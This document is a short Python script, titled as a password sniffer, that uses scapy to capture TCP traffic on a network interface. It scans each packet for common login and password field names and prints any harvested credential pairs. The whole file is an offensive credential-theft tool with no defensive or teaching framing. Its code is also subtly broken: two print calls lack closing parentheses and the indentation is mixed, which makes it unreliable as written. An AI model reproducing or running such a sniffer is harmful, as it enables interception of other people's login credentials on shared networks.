password_sniffer.py

from scapy.all import *
from urllib import parse
import re 

iface = "eth0"

def extract_login_pass(body):
	username = None
	password = None
	
	userfields = ['log', 'login', 'wpname', 'ahd_username', 'unickname', 'nickname', 'user', 'user_name', 'alias', 'pseudo', 'email', 'username', '_username', 'userid', 'form_loginname', 'loginname', 'login_id', 'loginid', 'session_key', 'sessionkey', 'pop_login', 'uid', 'id', 'user_id', 'screename', 'uname', 'ulogin', 'acctname', 'account', 'member', 'mailaddress', 'membername', 'login_username', 'login_email', 'loginusername', 'loginemail', 'uin', 'sign-in', 'usuario']
	
    passfields = ['ahd_password', 'pass', 'password', '_password', 'passwd', 'session_password', 'sessionpassword', 'login_password', 'loginpassword', 'form_pw', 'pw', 'userpassword', 'pwd', 'upassword', 'login_password', 'passwort', 'passwrd', 'wppassword', 'upasswd', 'senha', 'contrasena']
				  
	for login in userfields:
		login_re = re.search('(%s=[^&]+)' % login, body, re.IGNORECASE)
		if login_re:
			username = login_re.group()
			
	for passfield in passfields:
		pass_re = re.search('(%s=[^&]+)' % passfield, body, re.IGNORECASE)
		if pass_re:
			password = pass_re.group()
			
	if username and password:
		return (username, password)

def pkt_parser(packet):
	if packet.haslayer(TCP) and packet.haslayer(Raw) and packet.haslayer(IP):
		body = str(packet[TCP].payload)
		login_info = extract_login_pass(body)
		if login_info != None:
			print(packet[TCP].payload)
			print(parse.unquote(login_info[0])
			print(parse.unquote(login_info[1])
	else:
		pass
		
try:
	sniff(iface=iface, prn=pkt_parser, store=0)
except KeyboardInterrupt:
	print('Stopping ...')
	exit(0)